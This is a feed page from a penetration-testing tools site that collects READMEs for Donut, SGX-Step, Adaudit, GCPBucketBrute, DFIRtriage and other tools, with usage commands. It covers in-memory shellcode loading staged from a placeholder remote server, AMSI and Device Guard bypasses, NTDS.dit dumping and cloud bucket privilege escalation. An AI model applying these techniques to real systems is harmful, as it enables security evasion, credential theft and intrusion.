Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5839 articles
Browse latest View live

Donut - Generates X86, X64, Or AMD64+x86 Position-Independent Shellcode That Loads .NET Assemblies, PE Files, And Other Windows Payloads From Memory

$
0
0

Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
It can be used in several ways.

As a Standalone Tool
Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for loader generation. The Python documentation can be found here. The command-line syntax is as described below.
 usage: donut [options] -f <EXE/DLL/VBS/JS>

-MODULE OPTIONS-

-f <path> .NET assembly, EXE, DLL, VBS, JS file to execute in-memory.
-n <name> Module name. Randomly generated by default.
-u <URL> HTTP server that will host the donut module.

-PIC/SHELLCODE OPTIONS-

-a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
-b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
-o <loader> Output file. Default is "loader.bin"
-e Encode output file with Base64. (Will be copied to clipboard on Windows)
-t Run entrypoint for unmanaged EXE as a new thread. (replaces ExitProcess with ExitThread in IAT)
-x Call RtlExitUserPr ocess to terminate the host process. (RtlExitUserThread is called by default)

-DOTNET OPTIONS-

-c <namespace.class> Optional class name. (required for .NET DLL)
-m <method | api> Optional method or API name for DLL. (a method is required for .NET DLL)
-p <parameters> Optional parameters inside quotations.
-r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
-d <name> AppDomain name to create for .NET. Randomly generated by default.

examples:

donut -f c2.dll
donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
donut -f loader.dll -c TestClass -m RunProcess -p"calc notepad" -u http://remote_server.com/modules/

Building Donut
Tags have been provided for each release version of donut that contain the compiled executables.
However, you may also clone and build the source yourself using the provided makefiles.

Building From Repository
From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
git clone http://github.com/thewover/donut
cd donut

Linux
Simply run make to generate an executable, static and dynamic libraries.
make
make clean
make debug

Windows
Start a Microsoft Visual Studio Developer Command Prompt and cd to donut's directory. The Microsft (non-gcc) Makefile can be specified with -f Makefile.msvc. The makefile provides the following commmands to build donut:
nmake -f Makefile.msvc
nmake clean -f Makefile.msvc
nmake debug -f Makefile.msvc

As a Library
donut can be compiled as both dynamic and static libraries for both Linux (.a / .so) and Windows(.lib / .dll). It has a simple API that is described in docs/api.html. Two exported functions are provided: int DonutCreate(PDONUT_CONFIG c) and int DonutDelete(PDONUT_CONFIG c) .

As a Python Module
Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
pip install .
Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
pip install donut-shellcode

As a Template - Rebuilding the shellcode
loader/ contains the in-memory execution code for EXE/DLL/VBS/JS and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and MinGW-w64. Make files have been provided for both compilers. Whenever files in the loader directory have been changed, recompiling for all architectures is recommended before rebuilding donut.

Microsoft Visual Studio
Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.
Open the x64 Microsoft Visual Studio build environment, switch to the loader directory, and type the following:
nmake clean -f Makefile.msvc
nmake -f Makefile.msvc
This should generate a 64-bit executable (loader.exe) from loader.c. exe2h will then extract the shellcode from the .text segment of the PE file and save it as a C array to loader_exe_x64.h. When donut is rebuilt, this new shellcode will be used for all loaders that it generates.
To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the loader directory, and type the following:
nmake clean -f Makefile.msvc
nmake x86 -f Makefile.msvc
This will save the shellcode as a C array to loader_exe_x86.h.

MinGW-W64
Assuming you're on Linux and MinGW-W64 has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the loader directory and type the following:
make clean -f Makefile.mingw
make -f Makefile.mingw
Once you've recompiled for all architectures, you may rebuild donut.

Bypasses
Donut includes a bypass system for AMSI and other security features. Currently we bypass:
  • AMSI in .NET v4.8
  • Device Guard policy preventing dynamicly generated code from executing
You may customize our bypasses or add your own. The bypass logic is defined in loader/bypass.c.
Each bypass implements the DisableAMSI fuction with the signature BOOL DisableAMSI(PDONUT_INSTANCE inst), and comes with a corresponding preprocessor directive. We have several #if defined blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called BYPASS_AMSI_A. If donut is built with that variable defined, then that bypass will be used.
Why do it this way? Because it means that only the bypass you are using is built into loader.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an if defined block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
Odzhan wrote a blog post on the details of our AMSI bypass research.

Additional features.
These are left as exercises to the reader. I would personally recommend:
  • Add environmental keying
  • Make donut polymorphic by obfuscating loader every time shellcode is generated
  • Integrate donut as a module into your favorite RAT/C2 Framework

Disclaimers
  • No, we will not update donut to counter signatures or detections by any AV.
  • We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.

How it works

Procedure for Assemblies
Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
The logic above describes how the shellcode generated by donut works. That logic is defined in loader.exe. To get the shellcode, exe2h extracts the compiled machine code from the .text segment in loader.exe and saves it as a C array to a C header file. donut combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.

Procedure for ActiveScript/XSL
The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a blog post.

Procedure for PE Loading
The details of how Donut loads PE files from memory have been detailed by Odzhan in a blog post.
Only PE files with relocation information (.reloc) are supported. TLS callbacks are only executed upon process creation.

Components
Donut contains the following elements:
  • donut.c: The source code for the donut loader generator.
  • donut.exe: The compiled loader generator as an EXE.
  • donut.py: The donut loader generator as a Python script (planned for version 1.0)
  • donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
  • setup.py: The setup file for installing Donut as a Pip Python3 module.
  • lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform.
  • lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform.
  • lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project.
  • loader/loader.c: Main file for the shellcode.
  • loader/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
  • loader/inmem_pe.c: In-Memory loader for EXE/DLL files.
  • loader/inmem_script.c: In-Memory loader for VBScript/JScript files.
  • loader/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
  • loader/wscript.c: Supports a number of WScript methods that cscript/wscript support.
  • loader/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP).
  • loader/http_client.c: Downloads a module from remote staging server into memory.
  • loader/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
  • loader/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
  • loader/inject.exe: The compiled C shellcode injector.
  • loader/inject.c: A C shellcode injector that injects loader.bin into a specified process for testing.
  • loader/runsc.c: A C shellcode runner for testing loader.bin in the simplest manner possible.
  • loader/runsc.exe: The compiled C shellcode runner.
  • loader/exe2h/exe2h.c: Source code for exe2h.
  • loader/exe2h/exe2h.exe: Extracts the useful machine code from loader.exe and saves as array to C header file.
  • encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
  • hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.

Subprojects
There are three companion projects provided with donut:
  • DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
  • DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
  • ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
  • ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.

Project plan
  • Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.
  • Create a C# version of the generator.
  • Create a donut.py generator that uses the same command-line parameters as donut.exe.
  • Add support for HTTP proxies. * Find ways to simplify the shellcode if possible.
  • Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design loaders that work with it.
  • Dynamic Calls to DLL functions.
  • Handle the ProcessExit event from AppDomain using unmanaged code.



Sojobo - A Binary Analysis Framework

$
0
0

Sojobo is an emulator for the B2R2 framework. It was created to easier the analysis of potentially malicious files. It is totally developed in .NET so you don't need to install or compile any other external libraries (the project is self contained).
With Sojobo you can:
  • Emulate a (32 bit) PE binary
  • Inspect the memory of the emulated process
  • Read the process state
  • Display a disassembly of the executed code
  • Emulate functions in a managed language (C# || F#)

Using Sojobo
Sojobo is intended to be used as a framework to create program analysis utilities. However, various sample utilities were created in order to show how to use the framework in a profitable way.

Tengu
Tengu is an utility which is based on Sojobo. It allows to emulate a given process and control the execution by providing a debugger like UI (in particular it was inspired by the windbg debugger).

Documentation
The project is fully documented in F# (cit.) :) Joking apart, I plan to write some blog posts related to how to use Sojobo. Below a list of the current posts:
You can also read the API documentation.

Compile
In order to compile Sojobo you need .NET Core to be installed and Visual Studio. To compile just run build.bat.


Vscan - Vulnerability Scanner Tool Using Nmap And Nse Scripts

$
0
0

vulnerability scanner tool is using nmap and nse scripts to find vulnerabilities
This tool puts an additional value into vulnerability scanning with nmap. It uses NSE scripts which can add flexibility in terms of vulnerability detection and exploitation. Below there are some of the features that NSE scripts provide
  • Network discovery
  • More sophisticated version detection
  • Vulnerability detection
  • Backdoor detection
  • Vulnerability exploitation

This tool uses the path /usr/share/nmap/scripts/ where the nse scripts are located in kali linux
The tool performs the following
  • check the communication to the target hosts by cheking icmp requests
  • takes as input a protocol name such as http and executes all nse scripts related to that protocol
  • if any vulnerability triggers it saves the output into a log file
  • it may perform all of the above actions for a range of IP addresses
If the tool finds a vulnerabilty in a certain protocol (e.g http) it keeps the output into a log file which is created and saved in the following location /home/vulnerabilities_enumeration/http_vulnerabilities/http_vulnerabilities/http_vulnerabilities.txt In this example the folders have been created using the protocol prefix which in the current occasion is the http protocol.

Usage:
[Usage:] ./vscan.sh <ip_range> <protocol> <port> <Pn (optional)>
[Usage:] ./vscan.sh <ips_file> <protocol> <port> <Pn (optional)>
[Usage:] ./vscan.sh <ip> <protocol> <port> <Pn (optional)>

How to run:
./vscan.sh 192.168.162.90 http 80
./vscan.sh 192.168.162.10-90 http 80
./vscan.sh 192.168.162.90 ssh 22 Pn
./vscan.sh IPs.txt smb 445

References:
Screenshots:
Example: SMB scanning


 Example: Slowloris vulnerability detection


Example: multiple IP scanning SSH weak keys


Example: When the system is down or no ICMP requests



DFIRtriage - Digital Forensic Acquisition Tool For Windows Based Incident Response

$
0
0

DFIRtriage is a tool intended to provide Incident Responders with rapid host data. Written in Python, the code has been compiled to eliminate the dependency of python on the target host. The tool will run a variety of commands automatically upon execution. The acquired data will reside in the root of the execution directory. DFIRTriage may be ran from a USB drive or executed in remote shell on the target. Windows-only support.

What’s New?
*General
  • Efficiency updates were made to the code improving flow, cleaning up bugs, and providing performance improvements.
  • Cleaned up the output directory structure
  • Removed TZworks tools from toolset avoiding licensing issues
  • Added commandline arguments for new functionality (run "DFIRtriage --help" for details)
*Memory acquisition
  • memory is now acquired by default
  • argument required to bypass memory acquisition
  • free space check conducted prior to acquiring memory
  • updated acquisition process to avoid Windows 10 crashes
*New artifacts
  • windowsupdate.log file
  • Windows Defender scan logs
  • PowerShell command history
  • HOSTS files
  • netstat output now includes associated PID for all network connections
  • logging all users currently logged in to the target machine to the Triage_info.txt file
  • Pulling dozens of new events from the Windows Event logs
*New! DFIRtriage search tool
  • Conducts keyword search across DFIRtriage output data and writes findings to log file
  • The search tool is a separate executable (dtfind.exe)
  • Double-click to run or run from the command line (eg. dtfind -kw badstuff.php)

Dependencies
The tool repository contains the full toolset required for proper execution and is packed into a single a single file named “core.ir”. This “.ir” file is the only required dependency of DFIRtriage when running in Python and should reside in a directory named data, (ie. "./data/core.ir"). The compiled version of DFIRtriage has the full toolset embedded and does not require the addition of the "./data/core.ir" file. NOTE: TZWorks utilities are no longer utilized.

Contents
  • DFIRtriage.exe
    • compiled executable
  • .\data\core.ir
    • tool set repository (required for Python version only)
  • manifest.txt
    • file hashes for core components
  • unlicense.txt
    • copy of license agreement
  • source directory
    • DFIRtriage-v4-pub.py
  • dtfind.exe
    • compiled search tool executable

Operation
DFIRtriage acquires data from the host on which it is executed. For acquisitions of remote hosts, the DFIRtriage files will need to be copied to the target, then executed via remote shell. (ie. SSH or PSEXEC)

PSEXEC Usage
WARNING: Do not use PSEXEC arguments to pass credentials to a remote system for authentication. Doing so will send your username and password across the network in the clear.
The following steps should be taken for proper usage of PSEXEC
  1. Map a network drive and authenticate with an account that has local administrative privileges on the target host.
You can used this mapped connection to copy DFIRtriage to the target.
  1. We can now shovel a remote shell to the target host using PSEXEC.
    psexec \target_host cmd
  2. You now have a remote shell on the target. All commands executed at this point are done so on the target host.
Usage
  1. Once the remote shell has been established on the target you can change directory to the location of the extracted DFIRtriage.exe file and execute.
  2. Memory acquisition occurs by default, no arguments needed. To bypass memory acquisition, the "--nomem" argument can be passed.
  3. DFIRtriage must be executed with Administrative privileges.

Output Analysis
Once complete, press enter to cleanup the output directory. If running the executable, the only data remaining with be a zipped archive of the output as well as DFIRtriage.exe. If running the Python code directly only DFIRtriage-v4-pub.py and a zipped archive of the output are left.

Output Folder
The output folder name includes the target hostname and a date/time code indicating when DFIRtriage was executed. The date/time code format is YYYYMMDDHHMMSS.

Artifacts List
The following is a general listing of the information and artifacts gathered.
  • Memory Raw --> image acquisition (optional)
  • Prefetch --> Collects all prefetch files an parses into a report
  • PowerShell command history --> Gathers PowerShell command history for all users
  • User activity --> HTML report of recent user activity
  • File hash --> MD5 hash of all files in root of System32
  • Network information --> Network configuration, routing tables, etc
  • Network connections --> Established network connections
  • DNS cache entries --> List of complete DNS cache contents
  • ARP table information --> List of complete ARP cache contents
  • NetBIOS information --> Active NetBIOS sessions, transferred files, etc
  • Windows Update Log --> Gathers event tracelog information and builds Windows update log
  • Windows Defender Scanlog --> Gathers event tracelog information and builds Windows update log
  • Windows Event Logs --> Gathers and parses Windows Event Logs
  • Process information --> Processes, PID, and image path
  • List of remotely opened files --> Files on target system opened by remote hosts
  • Local user account names --> List of local user accounts
  • List of hidden directories --> List of all hidden directories on the system partition
  • Alternate Data Streams --> List of files containing alternate data streams
  • Complete file listing --> Full list of all files on the system partition
  • List of scheduled tasks --> List of all configured scheduled tasks
  • Hash of all collected data --> MD5 hash of all data collected by DFIRtriage
  • Installed software --> List of all installed software through WMI
  • Autorun information --> All autorun locations and content
  • Logged on users --> All users currently logged on to target system
  • Registry hives --> Copy of all registry hives
  • USB artifacts --> Collects data needed to parse USB usage info
  • Browser History --> browser history collection from multiple browsers


Sgx-Step - A Practical Attack Framework For Precise Enclave Execution Control

$
0
0

SGX-Step is an open-source framework to facilitate side-channel attack research on Intel SGX platforms. SGX-Step consists of an adversarial Linux kernel driver and user space library that allow to configure untrusted page table entries and/or x86 APIC timer interrupts completely from user space. Our research results have demonstrated several new and improved enclaved execution attacks that gather side-channel observations at a maximal temporal resolution (i.e., by interrupting the victim enclave after every single instruction).

Abstract
Trusted execution environments such as Intel SGX hold the promise of protecting sensitive computations from a potentially compromised operating system. Recent research convincingly demonstrated, however, that SGX's strengthened adversary model also gives rise to to a new class of powerful, low-noise side-channel attacks leveraging first-rate control over hardware. These attacks commonly rely on frequent enclave preemptions to obtain fine-grained side-channel observations. A maximal temporal resolution is achieved when the victim state is measured after every instruction. Current state-of-the-art enclave execution control schemes, however, do not generally achieve such instruction-level granularity.
This paper presents SGX-Step, an open-source Linux kernel framework that allows an untrusted host process to configure APIC timer interrupts and track page table entries directly from user space. We contribute and evaluate an improved approach to single-step enclaved execution at instruction-level granularity, and we show how SGX-Step enables several new or improved attacks. Finally, we discuss its implications for the design of effective defense mechanisms.
Jo Van Bulck, Frank Piessens, and Raoul Strackx. 2017. SGX-Step: A Practical Attack Framework for Precise Enclave Execution Control. In Proceedings of the 2nd Workshop on System Software for Trusted Execution (SysTEX '17).

Overview
Crucial to the design of SGX-Step, as opposed to previous enclave preemption proposals, is the creation of user-space virtual memory mappings for physical memory locations holding page table entries, as well as for the local APIC memory-mapped I/O configuration registers and the x86 Interrupt Descriptor Table (IDT). This allows an untrusted, attacker-controlled host process to easily (i) track or modify enclave page table entries, (ii) configure the APIC timer one-shot/periodic interrupt source, (iii) trigger inter-processor interrupts, and (iv) register custom interrupt handlers completely within user space.


The above figure summarizes the sequence of hardware and software steps when interrupting and resuming an SGX enclave through our framework.
  1. The local APIC timer interrupt arrives within an enclaved instruction.
  2. The processor executes the AEX procedure that securely stores execution context in the enclave’s SSA frame, initializes CPU registers, and vectors to the (user space) interrupt handler registered in the IDT.
  3. At this point, any attack-specific, spy code can easily be plugged in.
  4. The library returns to the user space AEP trampoline. We modified the untrusted runtime of the official SGX SDK to allow easy registration of a custom AEP stub. Furthermore, to enable precise evaluation of our approach on attacker-controlled benchmark debug enclaves, SGX-Step can optionally be instrumented to retrieve the stored instruction pointer from the interrupted enclave’s SSA frame. For this, our /dev/sgx-step driver offers an optional IOCTL call for the privileged EDBGRD instruction.
  5. Thereafter, we configure the local APIC timer for the next interrupt by writing into the initial-count MMIO register, just before executing (6) ERESUME.

Building and Running

0. System Requirements
SGX-Step requires an SGX-capable Intel processor, and an off-the-shelf Linux kernel. Our evaluation was performed on i7-6500U/6700 CPUs, running Ubuntu 16.04 with a stock Linux 4.15.0 kernel. We summarize Linux kernel parameters below.
Linux kernel parameterMotivation
nox2apicConfigure local APIC device in memory-mapped I/O mode (to make use of SGX-Step's precise single-stepping features).
iomem=relaxed, no_timer_checkSuppress unneeded warning messages in the kernel logs.
isolcpus=1Affinitize the victim process to an isolated CPU core.
dis_ucode_ldrDisable CPU microcode updates (Foreshadow/L1TF mitigations may affect single-stepping interval).
Pass the desired boot parameters to the kernel as follows:
$ sudo vim /etc/default/grub
# GRUB_CMDLINE_LINUX_DEFAULT="quiet splash nox2apic iomem=relaxed no_timer_check isolcpus=1"
$ sudo update-grub && sudo reboot
Finally, in order to reproduce our experimental results, make sure to disable C-States and SpeedStep technology in the BIOS configuration. The table below lists currently supported Intel CPUs, together with their single-stepping APIC timer interval (libsgxstep/config.h).
Model nameCPUBase frequencyAPIC timer interval
Skylakei7-67003.4 GHz19
Skylakei7-6500U2.5 GHz25
Skylakei5-6200U2.3 GHz28
Kaby Lake Ri7-8650U1.9 GHz34
Coffee Lake Ri9-9900K3.6 GHz21

1. Patch and install SGX SDK
To enable easy registration of a custom Asynchronous Exit Pointer (AEP) stub, we modified the untrusted runtime of the official Intel SGX SDK. Proceed as follows to checkout linux-sgx v2.6 and apply our patches.
$ git submodule init
$ git submodule update
$ ./install_SGX_driver.sh # tested on Ubuntu 16.04
$ ./patch_sdk.sh
$ ./install_SGX_SDK.sh # tested on Ubuntu 16.04
The above install scripts are tested on Ubuntu 16.04 LTS. For other GNU/Linux distributions, please follow the instructions in the linux-sgx project to build and install the Intel SGX SDK and PSW packages. You will also need to build and load an (unmodified) linux-sgx-driver SGX kernel module in order to use SGX-Step.
Note (local installation). The patched SGX SDK and PSW packages can be installed locally, without affecting a compatible system-wide 'linux-sgx' installation. For this, the example Makefiles support an SGX_SDK environment variable that points to the local SDK installation directory. When detecting a non-default SDK path (i.e., not /opt/intel/sgxsdk), the "run" Makefile targets furthermore dynamically link against the patched libsgx_urts.so untrusted runtime built in the local linux-sgx directory (using the LD_LIBRARY_PATH environment variable).
Note (32-bit support). Instructions for building 32-bit versions of the SGX SDK and SGX-Step can be found in README-m32.md.

2. Build and load /dev/sgx-step
SGX-Step comes with a loadable kernel module that exports an IOCTL interface to the libsgxstep user-space library. The driver is mainly responsible for (i) hooking the APIC timer interrupt handler, (ii) collecting untrusted page table mappings, and optionally (iii) fetching the interrupted instruction pointer for benchmark enclaves.
To build and load the /dev/sgx-step driver, execute:
$ cd kernel
$ make clean load
Note (/dev/isgx). Our driver uses some internal symbols and data structures from the official Intel /dev/isgx driver. We therefore include a git submodule that points to an unmodified v2.1 linux-sgx-driver.
Note (/dev/mem). We rely on Linux's virtual /dev/mem device to construct user-level virtual memory mappings for APIC physical memory-mapped I/O registers and page table entries of interest. Recent Linux distributions typically enable the CONFIG_STRICT_DEVMEM option which prevents such use, however. Our /dev/sgx-step driver therefore includes an approach to bypass devmem_is_allowed checks, without having to recompile the kernel.

3. Build and run test applications
User-space applications can link to the libsgxstep library to make use of SGX-Step's single-stepping and page table manipulation features. Have a look at the example applications in the "app" directory.
For example, to build and run the strlen attack from the paper for a benchmark enclave that processes the secret string 100 repeated times, execute:
$ cd app/bench
$ NUM=100 STRLEN=1 make parse # alternatively vary NUM and use BENCH=1 or ZIGZAG=1
$ # (above command defaults to the Dell Inspiron 13 7359 evaluation laptop machine;
$ # use DESKTOP=1 to build for a Dell Optiplex 7040 machine)
$ # use SGX_SDK=/home/jo/sgxsdk/ for a local SDK installation
$ # use M32=1 To produce a 32-bit executable
The above command builds libsgxstep, the benchmark victim enclave, and the untrusted attacker host process, where the attack scenario and instance size are configured via the corresponding environment variables. The same command also runs the resulting binary non-interactively (to ensure deterministic timer intervals), and finally calls an attack-specific post-processing Python script to parse the resulting enclave instruction pointer benchmark results.
Note (performance). Single-stepping enclaved execution incurs a substantial slowdown. We measured execution times of up to 15 minutes for the experiments described in the paper. SGX-Step's page table manipulation features allow to initiate single-stepping for selected functions only, for instance by revoking access rights on specific code or data pages of interest.
Note (timer interval). The exact timer interval value depends on CPU frequency, and hence remains inherently platform-specific. Configure a suitable value in /app/bench/main.c. We established precise timer intervals for our evaluation platforms (see table above) by tweaking and observing the NOP microbenchmark enclave instruction pointer trace results.

Using SGX-Step in your own projects
The easiest way to get started using the SGX-Step framwork in your own projects, is through git submodules:
$ cd my/git/project
$ git submodule add git@github.com:jovanbulck/sgx-step.git
$ cd sgx-step # Now build `/dev/sgx-step` and `libsgxstep` as described above
Have a look at the Makefiles in the app directory to see how a client application can link to libsgxstep plus any local SGX SDK/PSW packages.


Adaudit - Powershell Script To Do Domain Auditing Automation

$
0
0

PowerShell Script to perform a quick AD audit
_____ ____     _____       _ _ _
| _ | \ | _ |_ _ _| |_| |_
| | | | | | | | . | | _|
|__|__|____/ |__|__|___|___|_|_|
by phillips321
If you have any decent powershell one liners that could be used in the script please let me know. I'm trying to keep this script as a single file with no requirements on external tools (other than ntdsutil and cmd.exe)
Run directly on a DC using a DA. If you don't trust the code I suggest reading it first and you'll see it's all harmless! (But shouldn't you be doing that anyway with code you download off the net and then run as DA??)

What this does
  • Device Information
    • Get-HostDetails
  • Domain Audit
    • Get-MachineAccountQuota
    • Get-SMB1Support
    • Get-FunctionalLevel
    • Get-DCsNotOwnedByDA
  • Domain Trust Audit
    • Get-DomainTrusts
  • User Accounts Audit
    • Get-InactiveAccounts
    • Get-DisabledAccounts
    • Get-AdminAccountChecks
    • Get-NULLSessions
    • Get-AdminSDHolders
    • Get-ProtectedUsers
  • Password Information Audit
    • Get-AccountPassDontExpire
    • Get-UserPasswordNotChangedRecently
    • Get-PasswordPolicy
  • Dumps NTDS.dit
    • Get-NTDSdit
  • Computer Objects Audit
    • Get-OldBoxes
  • GPO audit (and checking SYSVOL for passwords)
    • Get-GPOtoFile
    • Get-GPOsPerOU
    • Get-SYSVOLXMLS
  • Check Generic Group AD Permissions
    • Get-OUPerms
  • Check For Existence of LAPS in domain
    • Get-LAPSStatus
  • Check For Existence of Authentication Polices and Silos
    • Get-AuthenticationPoliciesAndSilos

Runtime Args
The following switches can be used in combination
  • -hostdetails retrieves hostname and other useful audit info
  • -domainaudit retrieves information about the AD such as functional level
  • -trusts retrieves information about any doman trusts
  • -accounts identifies account issues such as expired, disabled, etc...
  • -passwordpolicy retrieves password policy information
  • -ntds dumps the NTDS.dit file using ntdsutil
  • -oldboxes identified outdated OSs like XP/2003 joined to the domain
  • -gpo dumps the GPOs in XML and HTML for later analysis
  • -ouperms checks generic OU permission issues
  • -laps checks if LAPS is installed
  • -authpolsilos checks for existenece of authentication policies and silos
  • -all runs all checks, e.g. AdAudit.ps1 -all


threat_note - DPS' Lightweight Investigation Notebook

$
0
0

threat_note is a web application built by Defense Point Security to allow security researchers the ability to add and retrieve indicators related to their research. As of right now this includes the ability to add IP Addresses, Domains and Threat Actors, with more types being added in the future.
This app fills the gap between various solutions currently available, by being lightweight, easy-to-install, and by minimizing fluff and extraneous information that sometimes gets in the way of adding information. To create a new indicator, you only really need to supply the object itself (whether it be a Domain, IP or Threat Actor) and change the type accordingly, and boom! That's it! Of course, supplying more information is definitely helpful, but, it's not required.
Other applications built for storing indicators and research have some shortcomings that threat_note hopes to fix. Some common complaints with other apps are:
  • Hard to install/configure/maintain
  • Need to pay for added features (enterprise licenses)
  • Too much information
    • This boils down to there being so much stuff to do to create new indicators or trying to cram a ton of functions inside the app.

Installation
Now that we are using SQLite, there's no need for a pesky Vagrant machine. All we need to do is install some requirements via pip and fire up the server:
cd threat_note
pip install -r requirements.txt
honcho start
Once the server is running, you can browse to http://localhost:5000 and register a new account to use to login into threat_note with.

Docker Installation
A development dockerfile is now available, to build it do the following from its directory:
sudo docker build -t threat_note .
sudo docker run -itd -p 8888:8888 threat_note
Once the server is running, you can browse to http://localhost:8888 and register a new account to use to login into threat_note with.

Usage
For a good "Getting Started" guide on using threat_note, check out this post by @CYINT_dude on his blog.

Screenshots
First up is a shot of the dashboard, which has the latest indicators, the latest starred indicators, and a campaign and indicator type breakdown.

Next is a screenshot of the Network Indicators page, here you will see all the indicators that have a type of "Domain", "Network", or "IP Address".

You can edit or remove the indicator right from this page, by hovering over the applicable icon on the right-hand side of the indicator.

Clicking on a network indicator will pull up the details page for the indicator. If you have Whois information turned on, you'll see the city and country underneath the indicator.

Clicking on the "New Indicator" button on the Network or Threat Actor page will bring up a page to enter details about your new indicator.

If you click on the "Edit Indicator" icon next to an indicator, you'll be presented with a page to edit any of the details you previously entered. You can also click on the "New Attribute" icon at the bottom right to add a new attribute to your indicator.

In the screenshot below you can see the "Threat Actors" page, which is similiar to the "Network Indicators" page, however, you'll only be presented with the Threat Actors you've entered.

Below is the Campaign page. It contains all of your indicators, broken out by campaign name. Please note that the "Edit Description" button to the right of the campaign description is broken right now, and will be fixed in a future release. Clicking on an indicator will take you to the indicator detail page.

Lastly, here is the Settings page, where you can delete your threat_note database, as well as control any 3rd party integrations, such as Whois data or VirusTotal information. Turning these integrations on can slow down the time to retrieve details about your indicator. A new feature recently added by @alxhrck was the ability to add an HTTP(s) proxy if you need it to connect to 3rd parties. He also recently added support for a new 3rd party integration, OpenDNS Investigate, which can be activated on this page.



GCPBucketBrute - A Script To Enumerate Google Storage Buckets, Determine What Access You Have To Them, And Determine If They Can Be Privilege Escalated

$
0
0

A script to enumerate Google Storage buckets, determine what access you have to them, and determine if they can be privilege escalated.
  • This script (optionally) accepts GCP user/service account credentials and a keyword.
  • Then, a list of permutations will be generated from that keyword which will then be used to scan for the existence of Google Storage buckets with those names.
  • If credentials are supplied, the majority of enumeration will still be performed while unauthenticated, but for any bucket that is discovered via unauthenticated enumeration, it will attempt to enumerate the bucket permissions using the TestIamPermissions API with the supplied credentials. This will help find buckets that are accessible while authenticated, but not while unauthenticated.
  • Regardless if credentials are supplied or not, the script will then try to enumerate the bucket permissions using the TestIamPermissions API while unauthenticated. This means that if you don't enter credentials, you will only be shown the privileges an unauthenticated user has, but if you do enter credentials, you will see what access authenticated users have compared to unauthenticated users.
  • WARNING: If credentials are supplied, your username can be disclosed in the access logs of any buckets you discover.

TL;DR Summary
  • Given a keyword, this script enumerates Google Storage buckets based on a number of permutations generated from the keyword.
  • Then, any discovered bucket will be output.
  • Then, any permissions that you are granted (if any) to any discovered bucket will be output.
  • Then the script will check those privileges for privilege escalation (storage.buckets.setIamPolicy) and will output anything interesting (such as publicly listable, publicly writable, authenticated listable, privilege escalation, etc).

Requirements
  • Linux/OS X
    • Windows only works for unauthenticated scans. Something is wrong with how the script uses the subprocess module in that it fails when using an authenticated Google client.
  • Python3
  • Pip3

Installation
